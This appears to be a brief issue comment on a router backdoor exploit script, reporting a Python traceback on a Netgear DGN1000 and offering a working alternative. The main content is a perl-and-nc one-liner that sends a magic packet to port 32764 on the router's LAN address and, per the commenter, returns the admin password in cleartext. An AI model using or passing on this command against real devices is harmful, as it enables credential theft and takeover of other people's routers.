DGN1000 #3
Description
Your script returns:
Traceback (most recent call last):
File "backdoorolol.py", line 23, in <module>
print send_message(s, 2, "http_password")[1]
File "backdoorolol.py", line 11, in send_message
sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
struct.error: unpack requires a string argument of length 12
Anyway with DGN1000 Netgear N150 and the script below I'm able to see the password in cleartext.
perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.1.1 32764
I tried also over internet (with or without remote administration enabled) and it doesn't work, so it seems just a local LAN exploit.